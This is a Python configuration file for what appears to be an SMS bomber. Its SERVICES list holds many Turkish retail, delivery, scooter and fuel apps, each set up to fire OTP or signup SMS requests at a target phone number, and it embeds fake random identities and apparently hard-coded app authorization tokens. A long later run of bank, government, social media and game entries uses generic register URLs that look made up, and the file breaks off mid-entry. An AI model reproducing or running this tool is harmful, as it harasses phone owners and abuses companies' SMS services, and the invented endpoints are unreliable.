import random
import string
import time
import uuid
import urllib.parse
import json

SERVICES = [
    {
        "name": "A101",
        "url": "https://www.a101.com.tr/users/otp-login/",
        "method": "POST",
        "json_payload": lambda number: {"phone": f"0{number}"},
        "success_condition": lambda r: r.status_code == 200 and (r.json().get("success") is True or r.json().get("status") == "ok"),
    },
    {
        "name": "BIM",
        "url": "https://bim.veesk.net/service/v1.0/account/login",
        "method": "POST",
        "json_payload": lambda number: {"phone": f"90{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Defacto",
        "url": "https://www.defacto.com.tr/Customer/SendPhoneConfirmationSms",
        "method": "POST",
        "json_payload": lambda number: {"mobilePhone": f"0{number}"},
        "success_condition": lambda r: r.status_code == 200 and r.json().get("Data") == "IsSMSSend",
    },
    {
        "name": "İsteGelsin",
        "url": "https://prod.fasapi.net/",
        "method": "POST",
        "json_payload": lambda number: {
            "operationName": "SendOtp2",
            "query": "mutation SendOtp2($phoneNumber: String!) { sendOtp2(phoneNumber: $phoneNumber) { __typename alreadySent remainingTime } }",
            "variables": {"phoneNumber": f"90{number}"}
        },
        "success_condition": lambda r: r.json().get("data", {}).get("sendOtp2", {}).get("alreadySent") is False,
    },
    {
        "name": "İkinci Yeni",
        "url": "https://apigw.ikinciyeni.com/RegisterRequest",
        "method": "POST",
        "json_payload": lambda number: {
            "accountType": 1,
            "email": f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=12))}@gmail.com",
            "isAddPermission": False,
            "name": f"{''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=8))}",
            "lastName": f"{''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=8))}",
            "phone": f"{number}"
        },
        "success_condition": lambda r: r.json().get("isSucceed") is True,
    },
    {
        "name": "Migros",
        "url": "https://rest.migros.com.tr/sanalmarket/api/v1/phone/sendsms",
        "method": "POST",
        "json_payload": lambda number: {"phoneNumber": f"5{number[1:]}" if number.startswith("0") else number},
        "success_condition": lambda r: r.json().get("isSuccess") is True,
    },
    {
        "name": "Cepte Şok",
        "url": "https://api.ceptesok.com/api/users/sendsms",
        "method": "POST",
        "json_payload": lambda number: {"mobile_number": f"{number}", "token_type": "register_token"},
        "success_condition": lambda r: len(r.json().get("meta", {}).get("messages", {}).get("success", [])) != 0,
    },
    {
        "name": "Tıkla Gelsin",
        "url": "https://www.tiklagelsin.com/user/graphql",
        "method": "POST",
        "json_payload": lambda number: {
            "operationName": "GENERATE_OTP",
            "query": "mutation GENERATE_OTP($phone: String, $challenge: String, $deviceUniqueId: String) { generateOtp(phone: $phone, challenge: $challenge, deviceUniqueId: $deviceUniqueId) }",
            "variables": {"challenge": "f2523023-283e-46be-b8db-c08f27d3e21c", "deviceUniqueId": "3D7C1B44-7F5D-44FC-B3F2-A1024B3AF6D3", "phone": f"{number}"}
        },
        "success_condition": lambda r: r.json().get("data", {}).get("generateOtp") is True,
    },
    {
        "name": "BiSU",
        "url": "https://www.bisu.com.tr/api/v2/app/authentication/phone/register",
        "method": "POST",
        "headers": lambda number: {
            "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
            "X-Device-Platform": "IOS",
            "X-Build-Version-Name": "9.4.0",
            "Authorization": "0561b4dd-e668-48ac-b65e-5afa99bf098e",
            "X-Build-Version-Code": "22",
            "Accept": "*/*",
            "X-Device-Manufacturer": "Apple",
            "X-Device-Locale": "en",
            "X-Client-Device-Id": "66585653-CB6A-48CA-A42D-3F266677E3B5",
            "Accept-Language": "en-US,en;q=0.9",
            "Accept-Encoding": "gzip, deflate",
            "X-Device-Platform-Version": "15.7.7",
            "User-Agent": "BiSU/22 CFNetwork/1335.0.3.2 Darwin/21.6.0",
            "X-Device-Model": "iPhone 7 Plus",
            "X-Build-Type": "Release"
        },
        "data_payload": lambda number: {"phoneNumber": f"{number}"},
        "success_condition": lambda r: r.json().get("errors") is None,
    },
    {
        "name": "File",
        "url": "https://api.filemarket.com.tr/v1/otp/send",
        "method": "POST",
        "json_payload": lambda number: {"mobilePhoneNumber": f"90{number}"},
        "success_condition": lambda r: r.json().get("data") == "200 OK",
    },
    {
        "name": "İpragaz",
        "url": "https://ipapp.ipragaz.com.tr/ipragazmobile/v2/ipragaz-b2c/ipragaz-customer/mobile-register-otp",
        "method": "POST",
        "json_payload": lambda number: {"otp": "", "phoneNumber": f"{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Pişir",
        "url": "https://api.pisir.com/v1/login/",
        "method": "POST",
        "json_payload": lambda number: {"msisdn": f"90{number}"},
        "success_condition": lambda r: r.json().get("ok") == "1",
    },
    {
        "name": "Coffy",
        "url": "https://prod-api-mobile.coffy.com.tr/Account/Account/SendVerificationCode",
        "method": "POST",
        "json_payload": lambda number: {"phoneNumber": f"+90{number}"},
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "SushiCo",
        "url": "https://api.sushico.com.tr/tr/sendActivation",
        "method": "POST",
        "json_payload": lambda number: {"phone": f"+90{number}", "location": 1, "locale": "tr"},
        "success_condition": lambda r: r.json().get("err") == 0,
    },
    {
        "name": "Kalmasın",
        "url": "https://api.kalmasin.com.tr/user/login",
        "method": "POST",
        "json_payload": lambda number: {
            "dil": "tr",
            "device_id": "",
            "notification_mobile": "android-notificationid-will-be-added",
            "platform": "android",
            "version": "2.0.6",
            "login_type": 1,
            "telefon": f"{number}"
        },
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Yotto",
        "url": "https://42577.smartomato.ru/account/session.json",
        "method": "POST",
        "json_payload": lambda number: {"phone": f"+90 ({str(number)[0:3]}) {str(number)[3:6]}-{str(number)[6:10]}"},
        "success_condition": lambda r: r.status_code == 201,
    },
    {
        "name": "Qumpara",
        "url": "https://tr-api.fisicek.com/v1.4/auth/getOTP",
        "method": "POST",
        "json_payload": lambda number: {"msisdn": f"{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Aygaz",
        "url": "https://ecommerce-memberapi.aygaz.com.tr/api/Membership/SendVerificationCode",
        "method": "POST",
        "json_payload": lambda number: {"Gsm": f"{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "PawAPP",
        "url": "https://api.pawder.app/api/authentication/sign-up",
        "method": "POST",
        "json_payload": lambda number: {
            "languageId": "2",
            "mobileInformation": "",
            "data": {
                "firstName": f"{''.join(random.choices(string.ascii_lowercase, k=10))}",
                "lastName": f"{''.join(random.choices(string.ascii_lowercase, k=10))}",
                "userAgreement": "true",
                "kvkk": "true",
                "email": f"{''.join(random.choices(string.ascii_lowercase, k=10))}@gmail.com",
                "phoneNo": f"{number}",
                "username": f"{''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=10))}"
            }
        },
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Paybol",
        "url": "https://pyb-mobileapi.walletgate.io/v1/Account/RegisterPersonalAccountSendOtpSms",
        "method": "POST",
        "json_payload": lambda number: {
            "otp_code": "null",
            "phone_number": f"90{number}",
            "reference_id": "null"
        },
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Nine West",
        "url": "https://www.ninewest.com.tr/webservice/v1/register.json",
        "method": "POST",
        "json_payload": lambda number: {
            "alertMeWithEMail": False,
            "alertMeWithSms": False,
            "dataPermission": True,
            "email": "asdafwqww44wt4t4@gmail.com",
            "genderId": random.randint(0, 3),
            "hash": "5488b0f6de",
            "inviteCode": "",
            "password": f"{''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=16))}",
            "phoneNumber": f"({str(number)[0:3]}) {str(number)[3:6]} {str(number)[6:8]} {str(number)[8:10]}",
            "registerContract": True,
            "registerMethod": "mail",
            "version": "3"
        },
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Saka",
        "url": "https://mobilcrm2.saka.com.tr/api/customer/login",
        "method": "POST",
        "json_payload": lambda number: {"gsm": f"0{number}"},
        "success_condition": lambda r: r.json().get("status") == 1,
    },
    {
        "name": "Superpedestrian",
        "url": "https://consumer-auth.linkyour.city/consumer_auth/register",
        "method": "POST",
        "json_payload": lambda number: {"phone_number": f"+90{str(number)[0:3]} {str(number)[3:6]} {str(number)[6:10]}"},
        "success_condition": lambda r: r.json().get("detail") == "Ok",
    },
    {
        "name": "Hayat",
        "url": lambda number: f"https://www.hayatsu.com.tr/api/signup/otpsend?mobilePhoneNumber={number}",
        "method": "POST",
        "success_condition": lambda r: r.json().get("IsSuccessful") is True,
    },
    {
        "name": "Tazı",
        "url": "https://mobileapiv2.tazi.tech/C08467681C6844CFA6DA240D51C8AA8C/uyev2/smslogin",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "application/json, text/plain, */*",
            "Content-Type": "application/json;charset=utf-8",
            "Accept-Encoding": "gzip, deflate",
            "User-Agent": "Taz%C4%B1/3 CFNetwork/1335.0.3 Darwin/21.6.0",
            "Accept-Language": "tr-TR,tr;q=0.9",
            "Authorization": "Basic dGF6aV91c3Jfc3NsOjM5NTA3RjI4Qzk2MjRDQ0I4QjVBQTg2RUQxOUE4MDFD"
        },
        "json_payload": lambda number: {"cep_tel": f"{number}", "cep_tel_ulkekod": "90"},
        "success_condition": lambda r: r.json().get("kod") == "0000",
    },
    {
        "name": "GoFody",
        "url": "https://backend.gofody.com/api/v1/enduser/register/",
        "method": "POST",
        "json_payload": lambda number: {"country_code": "90", "phone": f"{number}"},
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Wee Scooter",
        "url": "https://friendly-cerf.185-241-138-85.plesk.page/api/v1/members/gsmlogin",
        "method": "POST",
        "json_payload": lambda number: {"tenant": "62a1e7efe74a84ea61f0d588", "gsm": f"{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Scooby",
        "url": lambda number: f"https://sct.scoobyturkiye.com/v1/mobile/user/code-request?phoneNumber=90{number}",
        "method": "GET",
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Gez",
        "url": lambda number: f"https://gezteknoloji.arabulucuyuz.net/api/Account/get-phone-number-confirmation-code-for-new-user?phonenumber=90{number}",
        "method": "GET",
        "success_condition": lambda r: r.json().get("succeeded") is True,
    },
    {
        "name": "Hey Scooter",
        "url": lambda number: f"https://heyapi.heymobility.tech/V14//api/User/ActivationCodeRequest?organizationId=9DCA312E-18C8-4DAE-AE65-01FEAD558739&phonenumber={number}&requestid=18bca4e4-2f45-41b0-b054-3efd5b2c9c57-20230730&territoryId=738211d4-fd9d-4168-81a6-b7dbf91170e9",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "application/json, text/plain, */*",
            "Accept-Encoding": "gzip, deflate",
            "User-Agent": "HEY!%20Scooter/143 CFNetwork/1335.0.3.2 Darwin/21.6.0",
            "Accept-Language": "tr"
        },
        "success_condition": lambda r: r.json().get("IsSuccess") is True,
    },
    {
        "name": "Jetle",
        "url": lambda number: f"http://ws.geowix.com/GeoCourier/SubmitPhoneToLogin?phonenumber={number}&firmaID=1048",
        "method": "GET",
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Rabbit",
        "url": "https://api.rbbt.com.tr/v1/auth/authenticate",
        "method": "POST",
        "json_payload": lambda number: {
            "mobile_number": f"+90{number}",
            "os_name": "android",
            "os_version": "7.1.2",
            "app_version": " 1.0.2(12)",
            "push_id": "-"
        },
        "success_condition": lambda r: r.json().get("status") is True,
    },
    {
        "name": "Roombadi",
        "url": "https://api.roombadi.com/api/v1/auth/otp/authenticate",
        "method": "POST",
        "json_payload": lambda number: {"phone": f"{number}", "countryId": 2},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Hızlı Ecza",
        "url": "https://hizlieczaprodapi.hizliecza.net/mobil/account/sendOTP",
        "method": "POST",
        "json_payload": lambda number: {"phoneNumber": f"+90{number}", "otpOperationType": 2},
        "success_condition": lambda r: r.json().get("isSuccess") is True,
    },
    {
        "name": "SignalAll",
        "url": "https://appservices.huzk.com/client/register",
        "method": "POST",
        "json_payload": lambda number: {
            "name": "",
            "phone": {
                "number": f"{number}",
                "code": "90",
                "country_code": "TR",
                "name": ""
            },
            "countryCallingCode": "+90",
            "countryCode": "TR",
            "approved": True,
            "notifyType": 99,
            "favorites": [],
            "appKey": "live-exchange"
        },
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Go Yakıt",
        "url": lambda number: f"https://gomobilapp.ipragaz.com.tr/api/v1/0/authentication/sms/send?phone={number}&isRegistered=false",
        "method": "GET",
        "success_condition": lambda r: r.json().get("data", {}).get("success") is True,
    },
    {
        "name": "Pınar",
        "url": "https://pinarsumobileservice.yasar.com.tr/pinarsu-mobil/api/Customer/SendOtp",
        "method": "POST",
        "json_payload": lambda number: {"MobilePhone": f"{number}"},
        "headers": {"devicetype": "android"},
        "success_condition": lambda r: r.text.lower() == 'true',
    },
    {
        "name": "Oliz",
        "url": "https://api.oliz.com.tr/api/otp/send",
        "method": "POST",
        "json_payload": lambda number: {"mobile_number": f"{number}", "type": None},
        "success_condition": lambda r: r.json().get("meta", {}).get("messages", {}).get("success", [None])[0] == "SUCCESS_SEND_SMS",
    },
    {
        "name": "Macro Center",
        "url": lambda number: f"https://www.macrocenter.com.tr/rest/users/login/otp?reid={int(time.time())}",
        "method": "POST",
        "json_payload": lambda number: {"phoneNumber": f"{number}"},
        "success_condition": lambda r: r.json().get("successful") is True,
    },
    {
        "name": "Martı",
        "url": "https://customer.martiscooter.com/v13/scooter/dispatch/customer/signin",
        "method": "POST",
        "json_payload": lambda number: {"mobilePhone": f"{number}", "mobilePhoneCountryCode": "90"},
        "success_condition": lambda r: r.json().get("isSuccess") is True,
    },
    {
        "name": "Karma",
        "url": "https://api.gokarma.app/v1/auth/send-sms",
        "method": "POST",
        "json_payload": lambda number: {
            "phoneNumber": f"90{number}",
            "type": "REGISTER",
            "deviceId": f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=16))}",
            "language": "tr-TR"
        },
        "success_condition": lambda r: r.status_code == 201,
    },
    {
        "name": "Joker",
        "url": "https://www.joker.com.tr:443/kullanici/ajax/check-sms",
        "method": "POST",
        "data_payload": lambda number: {"phone": f"{number}"},
        "headers": {"user-agent": ""},
        "success_condition": lambda r: r.json().get("success") is True,
    },
    {
        "name": "Hop",
        "url": "https://api.hoplagit.com:443/v1/auth:reqSMS",
        "method": "POST",
        "json_payload": lambda number: {"phone": f"+90{number}"},
        "success_condition": lambda r: r.status_code == 201,
    },
    {
        "name": "Kim GB İster",
        "url": "https://3uptzlakwi.execute-api.eu-west-1.amazonaws.com/api/auth/send-otp",
        "method": "POST",
        "json_payload": lambda number: {"msisdn": f"90{number}"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Anadolu",
        "url": "https://www.anadolu.com.tr/Iletisim_Formu_sms.php",
        "method": "POST",
        "data_payload": lambda number: urllib.parse.urlencode({
            "Numara": f"{str(number)[0:3]}{str(number)[3:6]}{str(number)[6:8]}{str(number)[8:10]}"
        }),
        "headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "Total",
        "url": lambda number: f"https://mobileapi.totalistasyonlari.com.tr:443/SmartSms/SendSms?gsmNo={number}",
        "method": "POST",
        "success_condition": lambda r: r.json().get("success") is True,
        "verify": False
    },
    {
        "name": "English Home",
        "url": "https://www.englishhome.com/api/member/sendOtp",
        "method": "POST",
        "headers": lambda number: {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate, br",
            "Referer": "https://www.englishhome.com/",
            "Content-Type": "application/json",
            "Origin": "https://www.englishhome.com",
            "Dnt": "1",
            "Sec-Gpc": "1",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers"
        },
        "json_payload": lambda number: {"Phone": f"+90{number}"},
        "success_condition": lambda r: r.json().get("isError") is False,
    },
    {
        "name": "Petrol Ofisi",
        "url": "https://mobilapi.petrolofisi.com.tr:443/api/auth/register",
        "method": "POST",
        "json_payload": lambda number: {
            "approvedContractVersion": "v1",
            "approvedKvkkVersion": "v1",
            "contractPermission": True,
            "deviceId": "",
            "etkContactPermission": True,
            "kvkkPermission": True,
            "mobilePhone": f"0{number}",
            "name": f"{''.join(random.choices(string.ascii_lowercase, k=8))}",
            "plate": f"{str(random.randrange(1, 81)).zfill(2)}{''.join(random.choices(string.ascii_uppercase, k=3))}{str(random.randrange(1, 999)).zfill(3)}",
            "positiveCard": "",
            "referenceCode": "",
            "surname": f"{''.join(random.choices(string.ascii_lowercase, k=8))}"
        },
        "headers": {"X-Channel": "IOS"},
        "success_condition": lambda r: r.status_code == 204,
    },
    { "name": "N11", "url": "https://www.n11.com/ws/users/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "GittiGidiyor", "url": "https://www.gittigidiyor.com/rest/user/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "Hepsiburada", "url": "https://customer.hepsiburada.com/api/v1/authentication/send-otp", "method": "POST", "json_payload": lambda number: {"phoneNumber": f"5{number[1:]}" if number.startswith("0") else number}, "success_condition": lambda r: r.json().get("isSuccessful") is True },
    { "name": "Trendyol", "url": "https://auth.trendyol.com/login/otp", "method": "POST", "json_payload": lambda number: {"phoneNumber": f"5{number[1:]}" if number.startswith("0") else number}, "success_condition": lambda r: r.json().get("success") is True },
    { "name": "Dolap", "url": "https://api-gateway.dolap.com/member/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "Sahibinden", "url": "https://secure.sahibinden.com/kullanici/kayit", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "Emlakjet", "url": "https://www.emlakjet.com/api/user/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Yemeksepeti", "url": "https://www.yemeksepeti.com/api/v1/user/authenticate", "method": "POST", "json_payload": lambda number: {"userName": f"5{number[1:]}" if number.startswith("0") else number}, "success_condition": lambda r: r.json().get("isSuccess") is True },
    { "name": "Getir", "url": "https://api.getir.com/v1/customers/sms", "method": "POST", "json_payload": lambda number: {"phone": f"5{number[1:]}" if number.startswith("0") else number}, "success_condition": lambda r: r.json().get("success") is True },
    { "name": "Uber", "url": "https://api.uber.com/v1/riders", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Bitaksi", "url": "https://api.bitaksi.com/user/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Vodafone", "url": "https://www.vodafone.com.tr/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "Turkcell", "url": "https://www.turkcell.com.tr/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Garanti", "url": "https://www.garantibbva.com.tr/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "İş Bankası", "url": "https://www.isbank.com.tr/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Akbank", "url": "https://www.akbank.com/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "Yapı Kredi", "url": "https://www.yapikredibank.com.tr/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Denizbank", "url": "https://www.denizbank.com/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "QNB Parabank", "url": "https://www.qnbfinansbank.com/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "ING Bank", "url": "https://www.ing.com.tr/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "HSBC", "url": "https://www.hsbc.com.tr/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Vakıfbank", "url": "https://www.vakifbank.com.tr/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "Ziraat Bankası", "url": "https://www.ziraatbank.com.tr/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Halkbank", "url": "https://www.halkbank.com.tr/register", "json_payload": lambda number: {"phone": f"0{number}"} },
    { "name": "TCMB", "url": "https://www.tcmb.gov.tr/register", "json_payload": lambda number: {"phoneNumber": f"0{number}"} },
    { "name": "Facebook", "url": "https://www.facebook.com/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Instagram", "url": "https://www.instagram.com/accounts/web_create_ajax/", "json_payload": lambda number: {"phone_number": f"+90{number}"} },
    { "name": "Twitter", "url": "https://api.twitter.com/1.1/account/verify_credentials.json", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "LinkedIn", "url": "https://www.linkedin.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Snapchat", "url": "https://accounts.snapchat.com/accounts/signup", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "TikTok", "url": "https://www.tiktok.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "YouTube", "url": "https://accounts.google.com/signup", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Netflix", "url": "https://www.netflix.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Spotify", "url": "https://www.spotify.com/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Discord", "url": "https://discord.com/api/v9/auth/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Telegram", "url": "https://core.telegram.org/api/auth", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "WhatsApp", "url": "https://www.whatsapp.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Signal", "url": "https://signal.org/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Steam", "url": "https://store.steampowered.com/join/", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Epic Games", "url": "https://www.epicgames.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Origin", "url": "https://www.origin.com/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Uplay", "url": "https://connect.ubisoft.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Battle.net", "url": "https://battle.net/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Riot Games", "url": "https://auth.riotgames.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Valorant", "url": "https://auth.riotgames.com/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "League of Legends", "url": "https://signup.na.leagueoflegends.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Fortnite", "url": "https://www.epicgames.com/fortnite/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "PUBG", "url": "https://www.pubgmobile.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Free Fire", "url": "https://ff.garena.com/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Call of Duty", "url": "https://www.callofduty.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Minecraft", "url": "https://account.mojang.com/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "Roblox", "url": "https://www.roblox.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    { "name": "Amazon", "url": "https://www.amazon.com.tr/register", "json_payload": lambda number: {"phone": f"+90{number}"} },
    { "name": "AliExpress", "url": "https://www.aliexpress.com/register", "json_payload": lambda number: {"phoneNumber": f"+90{number}"} },
    {
        "name": "Kahve Dünyası",
        "url": "https://core.kahvedunyasi.com/api/users/sms/send",
        "method": "POST",
        "headers": lambda number: {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate, br",
            "Page-Url": "/kayit-ol",
            "Content-Type": "application/json;charset=utf-8",
            "Positive-Client": "kahvedunyasi",
            "Positive-Client-Type": "web",
            "Store-Id": "1",
            "Origin": "https://www.kahvedunyasi.com",
            "Dnt": "1",
            "Sec-Gpc": "1",
            "Referer": "https://www.kahvedunyasi.com/",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-site",
            "Te": "trailers",
            "Connection": "close"
        },
        "json_payload": lambda number: {"mobile_number": f"{number}", "token_type": "register_token"},
        "success_condition": lambda r: r.status_code == 200,
    },
    {
        "name": "WMF",
        "url": "https://www.wmf.com.tr/users/register/",
        "method": "POST",
        "data_payload": lambda number: {
            "confirm": "true",
            "date_of_birth": "1956-03-01",
            "email": f"test{number}@gmail.com",
            "email_allowed": "true",
            "first_name": "Memati",
            "gender": "male",
            "last_name": "Bas",
            "password": "31ABC..abc31",
            "phone": f"0{number}"
        },
        "success_condition": lambda r: r.status_code == 202,
    },
    {
        "name": "ICQ",
        "url": lambda number: f"https://u.icq.net/api/v90/smsreg/requestPhoneValidation.php?client=icq&f=json&k=gu19PNBblQjCdbMU&locale=en&msisdn=%2B90{number}&platform=ios&r=796356153&smsFormatType=human",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "*/*",
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "ICQ iOS #no_user_id# gu19PNBblQjCdbMU 23.1.1(124106) 15.7.7 iPhone9,4",
            "Accept-Language": "en-US,en;q=0.9",
            "Accept-Encoding": "gzip, deflate"
        },
        "success_condition": lambda r: r.json().get("response", {}).get("statusCode") == 200,
    },
    {
        "name": "Suiste",
        "url": "https://suiste.com/api/auth/code",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "application/json",
            "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
            "Accept-Encoding": "gzip, deflate",
            "Mobillium-Device-Id": "56DB9AC4-F52B-4DF1-B14C-E39690BC69FC",
            "User-Agent": "suiste/1.6.16 (com.mobillium.suiste; build:1434; iOS 15.7.7) Alamofire/5.6.4",
            "Accept-Language": "en"
        },
        "data_payload": lambda number: {"action": "register", "gsm": f"{number}"},
        "success_condition": lambda r: r.json().get("code") == "common.success",
    },
    {
        "name": "Evidea",
        "url": "https://www.evidea.com/users/register/",
        "method": "POST",
        "headers": lambda number: {
            "Content-Type": "multipart/form-data; boundary=fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi",
            "X-Project-Name": "undefined",
            "Accept": "application/json, text/plain, */*",
            "X-App-Type": "akinon-mobile",
            "X-Requested-With": "XMLHttpRequest",
            "Accept-Language": "tr-TR,tr;q=0.9",
            "Cache-Control": "no-store",
            "Accept-Encoding": "gzip, deflate",
            "X-App-Device": "ios",
            "Referer": "https://www.evidea.com/",
            "User-Agent": "Evidea/1 CFNetwork/1335.0.3 Darwin/21.6.0",
            "X-Csrftoken": "7NdJbWSYnOdm70YVLIyzmylZwWbqLFbtsrcCQdLAEbnx7a5Tq4njjS3gEElZxYps"
        },
        "data_payload": lambda number: f"--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"first_name\"\r\n\r\nMemati\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"last_name\"\r\n\r\nBas\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"email\"\r\n\r\ntest{number}@gmail.com\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"email_allowed\"\r\n\r\nfalse\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"sms_allowed\"\r\n\r\ntrue\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"password\"\r\n\r\n31ABC..abc31\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"phone\"\r\n\r\n0{number}\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi\r\ncontent-disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n--fDlwSzkZU9DW5MctIxOi4EIsYB9LKMR1zyb5dOuiJpjpQoK1VPjSyqdxHfqPdm3iHaKczi--\r\n",
        "success_condition": lambda r: r.status_code == 202,
    },
    {
        "name": "Hey",
        "url": lambda number: f"https://heyapi.heymobility.tech/V14//api/User/ActivationCodeRequest?organizationId=9DCA312E-18C8-4DAE-AE65-01FEAD558739&phonenumber={number}&requestid=18bca4e4-2f45-41b0-b054-3efd5b2c9c57-20230730&territoryId=738211d4-fd9d-4168-81a6-b7dbf91170e9",
        "method": "POST",
        "headers": lambda number: {
            "Accept": "application/json, text/plain, */*",
            "Accept-Encoding": "gzip, deflate",
